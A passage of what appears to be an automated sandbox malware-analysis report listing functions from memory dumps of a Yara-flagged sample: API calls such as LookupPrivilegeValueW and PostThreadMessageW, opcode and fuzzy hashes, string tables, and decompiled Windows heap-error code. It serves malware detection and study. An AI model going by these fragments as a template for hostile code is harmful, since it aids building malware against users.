Instruction Fuzzy Hash: 5D90027170110802D10065DA54086464089A7E0341F91D011A5554555ECAA988917171

Uniqueness

Uniqueness Score: -1.00%

Function 019596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019596EA

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 569aec02451a7fe02aec7272d0a9c667cae8fda09e35baa07a909a8ae40e7d24
Instruction ID: f91b4939feb7f198d1ff3a4755fa0855b5453bc3be94c3527f11e37ce117bf43
Opcode Fuzzy Hash: 569aec02451a7fe02aec7272d0a9c667cae8fda09e35baa07a909a8ae40e7d24
Instruction Fuzzy Hash: F890027170118C02D110619A840474A4089A7D0341F95C411A4954658DCAD988917171

Uniqueness

Uniqueness Score: -1.00%

Function 01959A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01959A0A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 70be8f57d21c4ac49b57e1136013b4e324c0d27dca1816fb3a6b22da6766aa17
Instruction ID: 9ec448856c52b33ff4160a161115ee48b3b8731f724a33b8c383281b07991a18
Opcode Fuzzy Hash: 70be8f57d21c4ac49b57e1136013b4e324c0d27dca1816fb3a6b22da6766aa17
Instruction Fuzzy Hash: 8F90027170150802D100619A481470B4089A7D0342F91C011A1694555DCA69885175B1

Uniqueness

Uniqueness Score: -1.00%

Function 01959A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01959A2A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bf4fab4bcdb50fd0a2a97e1e86a675f623bee21519469d3d14d764c957c3b51f
Instruction ID: 73c5794b0bdfbc7da20aae776eb5e78e8f9ed33961da172c97f71b58300ad60f
Opcode Fuzzy Hash: bf4fab4bcdb50fd0a2a97e1e86a675f623bee21519469d3d14d764c957c3b51f
Instruction Fuzzy Hash: E4900261B0110442414071AA88449068089BBE1251791C121A0EC8550DC99D886566B5

Uniqueness

Uniqueness Score: -1.00%

Function 01959A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01959A5A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c21e07a27c10c480578a2eb9f569557d7450b3a400183a7a10c10c54ed13731d
Instruction ID: 82e76ad0f8d068cf56642ecf51f0102592142ea3244295a2a4972a668ea955cf
Opcode Fuzzy Hash: c21e07a27c10c480578a2eb9f569557d7450b3a400183a7a10c10c54ed13731d
Instruction Fuzzy Hash: F590026171190442D20065AA4C14B074089A7D0343F91C115A0684554CCD5988616571

Uniqueness

Uniqueness Score: -1.00%

Function 01959660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0195966A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e3b0a4080fcfc4211583a066152f18dc0045c1ea7b980210b5fec04598773a6
Instruction ID: 02a3e7c1c45de610ecfec0d25eb4e17236c9e23668791d81e76d9b06f774b699
Opcode Fuzzy Hash: 7e3b0a4080fcfc4211583a066152f18dc0045c1ea7b980210b5fec04598773a6
Instruction Fuzzy Hash: 6990027170110C02D180719A440464A4089A7D1341FD1C015A0555654DCE598A5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407206, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Strings

3333, xrefs: 0040721E

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
Opcode ID: 1c0e393e6f6ecd70bda8255490f1e792086624d9fff756d2be40a63533a5a2d9
Instruction ID: 9503088a6501e9a52aae330dcfbca5c8e325d7ee4c2bfce9a069445d148953af
Opcode Fuzzy Hash: 1c0e393e6f6ecd70bda8255490f1e792086624d9fff756d2be40a63533a5a2d9
Instruction Fuzzy Hash: 4A110C31E452583ADB245A655C02FBF37989F41724F0884AEFE08BE2C2D56DBD1246DA

Uniqueness

Uniqueness Score: -1.00%

Function 004184C3, Relevance: 3.0, APIs: 2, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 7173c6a74cce1d342c7862df2b000da286539f64fb8119fd794b7c422b9699f5
Instruction ID: 5e89942307f3d2207b1607e7e3005695b274b0420483efb659cdd709be436c00
Opcode Fuzzy Hash: 7173c6a74cce1d342c7862df2b000da286539f64fb8119fd794b7c422b9699f5
Instruction Fuzzy Hash: 18F06DB12002007BCB14EF65DC85D977769EF84310F118549FD585B242DA30ED508AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00418665, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: eafa9399280ec89408d95782182288315bd682779e2c25c4ebe6f01344fbc578
Instruction ID: df4e5d4c50a8ee700ee4b252894c3cc67ecb399ff3efa6f4565f75ba072bac3c
Opcode Fuzzy Hash: eafa9399280ec89408d95782182288315bd682779e2c25c4ebe6f01344fbc578
Instruction Fuzzy Hash: 39216DB2200208BBDB24DF58DC45EE737ADEF88310F01855DFA0CAB641CA34E9518BE4

Uniqueness

Uniqueness Score: -1.00%

Function 0041862A, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5f89ed839f930913f7af0067515820de52b32d16e1116c212d15d980e60c2416
Instruction ID: 2d239015c469b46644f3981eef8d27eeadfb6414ade46ecb633a7a7017f43826
Opcode Fuzzy Hash: 5f89ed839f930913f7af0067515820de52b32d16e1116c212d15d980e60c2416
Instruction Fuzzy Hash: 0A1159B52002086BCB14DF99DC85EEB37A9EF89354F01855AFE0C9B241CA34E9118BF4

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 004072E4, Relevance: 1.6, APIs: 1, Instructions: 52threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 92bf08f276159b512db10341e3141c055209967f187aaab44ead36dbec4ca5f4
Instruction ID: 3121fc6986cf8ae50ba8d6675e2133320132041630b108ef294ffaf0c355032c
Opcode Fuzzy Hash: 92bf08f276159b512db10341e3141c055209967f187aaab44ead36dbec4ca5f4
Instruction Fuzzy Hash: A101DB31E8021876E724A6909C43FFE772C5B40B55F15405EFF04BA1C1D6A87D0647EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418508, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e871349d94609dcd320c9aa46dd249900bd79a403ee3fbcccd21022e5e1a5e57
Instruction ID: 1d9f17eb033bb9a8dcab7e4781066ae5b182857fd44e18f0e6b841b520ac239f
Opcode Fuzzy Hash: e871349d94609dcd320c9aa46dd249900bd79a403ee3fbcccd21022e5e1a5e57
Instruction Fuzzy Hash: 640156B2200208ABDB14DF98DC84DEB33A9EF9C250F018209FA4C9B241CA30E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418456, Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9166814a1b9337c75d0b10b6963e62a533780551f2b3932bf76439c922d6724e
Instruction ID: f19b84f3fb4b98287ed207175da4bbbd0e4a5beff73ed650df0103b647d0ac5a
Opcode Fuzzy Hash: 9166814a1b9337c75d0b10b6963e62a533780551f2b3932bf76439c922d6724e
Instruction Fuzzy Hash: E8F0A072204314ABD728EF84EC85EE7776DEF84350F01849DFA485B251DA36EA14C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418599, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f21f2c38ab94e2354d4dd22777ffe673213f409ec7528a7c837b2d5a449dad32
Instruction ID: ba1632a06b2621c962b97fc1f0f45c0581a8a9ea6bb2121fb145e324483ce32b
Opcode Fuzzy Hash: f21f2c38ab94e2354d4dd22777ffe673213f409ec7528a7c837b2d5a449dad32
Instruction Fuzzy Hash: B9D022712401126BC2059F308C85FCB335CEF41700F10842DF918AF183CB34EA0296F0

Uniqueness

Uniqueness Score: -1.00%

Function 0195967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01959694

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be125895fd3831ecf7d28d70d2b085c6c115c5938c131fd304594cb049492f47
Instruction ID: 1667c847c307e4e1e8b92546c28b29d5ae34bb068c5dd10e9f7b859cdcfe61af
Opcode Fuzzy Hash: be125895fd3831ecf7d28d70d2b085c6c115c5938c131fd304594cb049492f47
Instruction Fuzzy Hash: 7BB02B71D020C5C5E701D3A00608717798477C0305F12C011D1060240F473CC080F2B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 019CB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** A stack buffer overrun occurred in %ws:%s, xrefs: 019CB2F3
write to, xrefs: 019CB4A6
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 019CB53F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 019CB305
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 019CB484
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 019CB314
The resource is owned shared by %d threads, xrefs: 019CB37E
The critical section is owned by thread %p., xrefs: 019CB3B9
*** enter .exr %p for the exception record, xrefs: 019CB4F1
<unknown>, xrefs: 019CB27E, 019CB2D1, 019CB350, 019CB399, 019CB417, 019CB48E
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 019CB38F
*** An Access Violation occurred in %ws:%s, xrefs: 019CB48F
read from, xrefs: 019CB4AD, 019CB4B2
The instruction at %p tried to %s , xrefs: 019CB4B6
*** enter .cxr %p for the context, xrefs: 019CB50D
Go determine why that thread has not released the critical section., xrefs: 019CB3C5
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 019CB476
The resource is owned exclusively by thread %p, xrefs: 019CB374
a NULL pointer, xrefs: 019CB4E0
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 019CB323
*** Inpage error in %ws:%s, xrefs: 019CB418
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 019CB39B
an invalid address, %p, xrefs: 019CB4CF
The instruction at %p referenced memory at %p., xrefs: 019CB432
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 019CB2DC
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 019CB3D6
*** then kb to get the faulting stack, xrefs: 019CB51C
*** Resource timeout (%p) in %ws:%s, xrefs: 019CB352
This failed because of error %Ix., xrefs: 019CB446
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 019CB47D

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: de681ba2267c30649091feffeaf8feaa3f8874ae1dd4edbda8c6681fe1a2076b
Instruction ID: fc51f2690e1f2ce35f36822a2cc5e2c60e092b472f2eaa7d62c1e1e08068b31d
Opcode Fuzzy Hash: de681ba2267c30649091feffeaf8feaa3f8874ae1dd4edbda8c6681fe1a2076b
Instruction Fuzzy Hash: 17810435B01210FFEB226A8A8C46D7F7F6AAF96ED2F41404CF54D2B152E2618951C7B3

Uniqueness

Uniqueness Score: -1.00%

Function 019D1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E019D1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18f48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0191B150();
				} else {
					E0191B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1a0589c);
				E0191B150("Heap error detected at %p (heap handle %p)\n",  *0x1a058a0);
				_t27 =  *0x1a05898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M019D1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0191B150();
				} else {
					E0191B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0191B150("Error code: %d - %s\n",  *0x1a05898);
				_t113 =  *0x1a058a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0191B150();
					} else {
						E0191B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0191B150("Parameter1: %p\n",  *0x1a058a4);
				}
				_t115 =  *0x1a058a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0191B150();
					} else {
						E0191B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0191B150("Parameter2: %p\n",  *0x1a058a8);
				}
				_t117 =  *0x1a058ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0191B150();
					} else {
						E0191B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0191B150("Parameter3: %p\n",  *0x1a058ac);
				}
				_t119 =  *0x1a058b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0191B150();
					} else {
						E0191B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1a058b4);
					E0191B150("Last known valid blocks: before - %p, after - %p\n",  *0x1a058b0);
				} else {
					_t120 =  *0x1a058b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0191B150();
				} else {
					E0191B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0191B150("Stack trace available at %p\n", 0x1a058c0);
			}

0x019d1c10
0x019d1c16
0x019d1c1e
0x019d1c3d
0x019d1c3e
0x019d1c20
0x019d1c35
0x019d1c3a
0x019d1c44
0x019d1c55
0x019d1c5a
0x019d1c65
0x019d1c67
0x00000000
0x019d1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x019d1c67
0x019d1cdc
0x019d1ce5
0x019d1d04
0x019d1d05
0x019d1ce7
0x019d1cfc
0x019d1d01
0x019d1d0b
0x019d1d17
0x019d1d1f
0x019d1d25
0x019d1d30
0x019d1d4f
0x019d1d50
0x019d1d32
0x019d1d47
0x019d1d4c
0x019d1d61
0x019d1d67
0x019d1d68
0x019d1d6e
0x019d1d79
0x019d1d98
0x019d1d99
0x019d1d7b
0x019d1d90
0x019d1d95
0x019d1daa
0x019d1db0
0x019d1db1
0x019d1db7
0x019d1dc2
0x019d1de1
0x019d1de2
0x019d1dc4
0x019d1dd9
0x019d1dde
0x019d1df3
0x019d1df9
0x019d1dfa
0x019d1e00
0x019d1e0a
0x019d1e13
0x019d1e32
0x019d1e33
0x019d1e15
0x019d1e2a
0x019d1e2f
0x019d1e39
0x019d1e4a
0x019d1e02
0x019d1e02
0x019d1e08
0x00000000
0x00000000
0x019d1e08
0x019d1e5b
0x019d1e7a
0x019d1e7b
0x019d1e5d
0x019d1e72
0x019d1e77
0x019d1e95

Strings

heap_failure_lfh_bitmap_mismatch, xrefs: 019D1CD7
heap_failure_freelists_corruption, xrefs: 019D1CC9
heap_failure_invalid_allocation_type, xrefs: 019D1CB4
heap_failure_block_not_busy, xrefs: 019D1CA6
heap_failure_unknown, xrefs: 019D1C75
Error code: %d - %s, xrefs: 019D1D12
heap_failure_usage_after_free, xrefs: 019D1CBB
heap_failure_listentry_corruption, xrefs: 019D1CD0
Stack trace available at %p, xrefs: 019D1E86
heap_failure_generic, xrefs: 019D1C7C
heap_failure_buffer_underrun, xrefs: 019D1C9F
heap_failure_internal, xrefs: 019D1C6E
Parameter3: %p, xrefs: 019D1DEE
Last known valid blocks: before - %p, after - %p, xrefs: 019D1E45
HEAP: , xrefs: 019D1C16, 019D1C3D, 019D1D04, 019D1D4F, 019D1D98, 019D1DE1, 019D1E32, 019D1E7A
heap_failure_virtual_block_corruption, xrefs: 019D1C91
HEAP[%wZ]: , xrefs: 019D1C30, 019D1CF7, 019D1D42, 019D1D8B, 019D1DD4, 019D1E25, 019D1E6D
heap_failure_multiple_entries_corruption, xrefs: 019D1C8A
heap_failure_entry_corruption, xrefs: 019D1C83
Heap error detected at %p (heap handle %p), xrefs: 019D1C50
Parameter1: %p, xrefs: 019D1D5C
Parameter2: %p, xrefs: 019D1DA5
heap_failure_invalid_argument, xrefs: 019D1CAD
heap_failure_cross_heap_operation, xrefs: 019D1CC2
heap_failure_buffer_overrun, xrefs: 019D1C98

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 2a41c186b5c0cda755b7f7eb6f0d87f8b54844079f2dae1f83cba7cb8866b616
Instruction ID: b904e88f46170d60c4ab21d5a461997619020afce346e3baecaebf4885f72926
Opcode Fuzzy Hash: 2a41c186b5c0cda755b7f7eb6f0d87f8b54844079f2dae1f83cba7cb8866b616
Instruction Fuzzy Hash: CF61E437911249DFD613AB99E884D20B3F5FB48A21B0AC83EF90E5B341D6349D818F1A

Uniqueness

Uniqueness Score: -1.00%

Function 01923D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01923D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
